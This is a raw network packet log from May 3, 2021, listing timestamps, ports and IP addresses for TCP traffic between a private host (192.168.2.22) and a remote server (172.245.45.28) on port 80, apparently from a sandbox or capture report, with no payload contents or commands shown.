May 3, 2021 10:44:30.459522009 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459528923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459548950 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459549904 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459563971 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459569931 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459580898 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459587097 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459605932 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459608078 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459623098 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459624052 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459638119 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459641933 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459655046 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459659100 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459676981 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459697008 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459702969 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459709883 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459721088 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459738016 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459758997 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459779024 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459795952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459813118 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459830046 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459830999 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459840059 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459844112 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459846020 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459851027 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459852934 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459853888 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459856987 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459861040 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459865093 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459872007 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459883928 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459888935 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459902048 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459908962 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459918976 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459928989 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459945917 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459949017 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459963083 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459965944 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459981918 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459983110 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459996939 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459999084 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460015059 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460017920 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460032940 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460036039 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460056067 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460074902 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460091114 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460108042 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460125923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460139036 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460141897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460146904 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460150957 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460154057 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460156918 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460160971 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460179090 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460187912 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460192919 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460195065 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460199118 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460201979 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460211039 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460218906 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460236073 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460237026 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460253954 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460254908 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460269928 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460273027 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460287094 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460289955 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460305929 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460308075 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460320950 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460326910 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460340023 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460346937 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460356951 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460366964 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460381031 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460382938 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460405111 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460410118 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460421085 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460429907 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460444927 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460445881 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460459948 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460464001 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460478067 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460481882 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460494041 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460500002 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460511923 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460517883 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460535049 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460542917 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460556984 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460571051 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460587025 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460603952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460607052 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460613012 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460614920 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460624933 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460624933 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460628986 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460639954 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460642099 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460656881 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460656881 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460675001 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460683107 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460690975 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460691929 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460705996 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460709095 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460724115 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460731983 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460751057 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460752964 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460767984 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460779905 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460784912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460802078 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460808992 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460818052 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460834026 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460850000 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460870981 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460890055 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460891008 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460900068 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460903883 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460906029 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460906982 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460910082 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460911989 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460922956 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460933924 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.460942030 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460954905 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460968018 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460980892 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460994005 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.460997105 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461004972 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461010933 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461013079 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461026907 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461029053 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461042881 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461051941 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461061954 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461065054 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461078882 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461081982 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461095095 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461097002 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461111069 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461112976 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461128950 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461132050 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461147070 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461148977 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461163044 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461167097 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461180925 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461183071 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461196899 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461200953 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461218119 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461224079 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461231947 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461235046 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461251974 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461257935 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461267948 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461270094 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461287975 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461301088 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461314917 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461318970 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461330891 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461334944 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461348057 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461353064 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461364031 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461369991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461380005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461407900 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461410999 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461426020 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461442947 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461442947 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461457968 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461458921 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461477995 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461479902 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461491108 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461498022 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461507082 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461513996 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461530924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461536884 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461546898 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461553097 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461564064 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461571932 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461582899 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461582899 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461596966 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461599112 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461611032 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461620092 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461628914 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461637974 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461654902 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461657047 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461674929 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461680889 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461692095 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461694002 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461709976 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461723089 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461726904 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.461743116 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461754084 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.461762905 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.464217901 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.628858089 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.628892899 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.628906012 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.628918886 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.628937006 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.628954887 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.628972054 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.628989935 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629005909 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629021883 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629040003 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629055977 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629060030 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629081011 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629087925 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629093885 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629096985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629098892 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629101038 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629105091 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629107952 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629110098 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629112005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629113913 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629117012 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629120111 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629127026 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629134893 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629142046 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629151106 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629152060 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629154921 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629169941 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629169941 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629187107 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629195929 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629209042 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629209042 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629225969 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629229069 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629244089 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629246950 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629266024 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629278898 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629285097 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629297972 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629312992 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629317045 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629319906 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629324913 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629334927 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629343033 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629353046 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629364014 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629373074 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629374981 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629410028 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629415989 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629421949 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629426956 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629445076 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629453897 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629462004 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629471064 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629482985 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629484892 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629498959 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629503012 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629517078 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629520893 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629534006 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629540920 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629554033 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629574060 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629591942 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629596949 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629602909 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629605055 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629606962 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629612923 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629622936 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629631996 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629642010 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629650116 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629663944 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629664898 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629679918 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629683018 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629698038 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629703045 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629718065 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629719973 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629738092 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629738092 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629760027 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629760981 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629781008 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629791021 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629796982 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629803896 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629815102 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629821062 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629837036 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.629837036 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.629851103 CEST	49166	80	192.168.2.22	172.245.45.28
